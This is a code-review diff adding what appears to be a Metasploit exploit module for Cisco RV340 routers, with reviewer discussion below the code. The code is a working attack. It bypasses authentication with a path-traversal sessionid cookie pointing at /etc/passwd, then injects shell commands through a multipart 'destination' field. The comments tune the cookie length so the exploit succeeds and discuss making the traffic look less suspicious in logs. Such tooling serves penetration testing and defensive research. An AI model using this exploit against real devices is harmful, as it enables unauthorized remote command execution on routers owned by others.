modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -0,0 +1,167 @@
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
+    # Test to see if router is responding and possibly vulnerable
+    res = send_exploit('id')
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
+
+    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
+      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
+    end
+
+    CheckCode::Safe('The target did not respond with an expected payload.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_exploit(cmd)
+
+    if target['Type'] != :unix_cmd
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
+      body_json = res.get_json_document
+      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
+    end
+
+    print_good('Exploit successfully executed.')
+  end
+
+  def send_exploit(cmd)
+    user = Rex::Text.rand_text_alphanumeric(5..12)
+    pass = Rex::Text.rand_text_alphanumeric(5..12)
+    filename = Rex::Text.rand_text_alphanumeric(5..12)
+    fileparam = Rex::Text.rand_text_alphanumeric(5..12)
+    input = Rex::Text.rand_text_alphanumeric(5..12)
+
+    send_request_cgi({
+      'encode_params' => false,
+      'method' => 'POST',
+      'uri' => '/jsonrpc',
+      'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
+    })
+
+    filepath = '/tmp/upload.input'
+    pathparam = 'Configuration'
+
+    destination = "'; " + cmd + ' #'
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
+    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
+    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
+    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
+    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
+    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/upload',
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'headers' => {
+        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
```

Comment:
This string of a's could likely be randomized.

Reply:
Updated with hardcoded length of 16, exploit fails otherwise.  Tested with lengths of 14, 15, 16, and 17.

Reply:
On a related note does this need to be `/etc/passwd`? This will look highly suspicious in logs.

Reply:
No, and I will find a much less suspicious file for my next commit.

Reply:
As mentioned below randomization may be better here.

Reply:
Mentioned below and copied my response here: The vulnerable code, which allows bypassing authentication, can be exploited by inserting a known file into the sessionid header. If this file is present on the system, the session check will pass.

Reply:
Yep makes sense this was more of a double check. Current values make sense given existing requirements.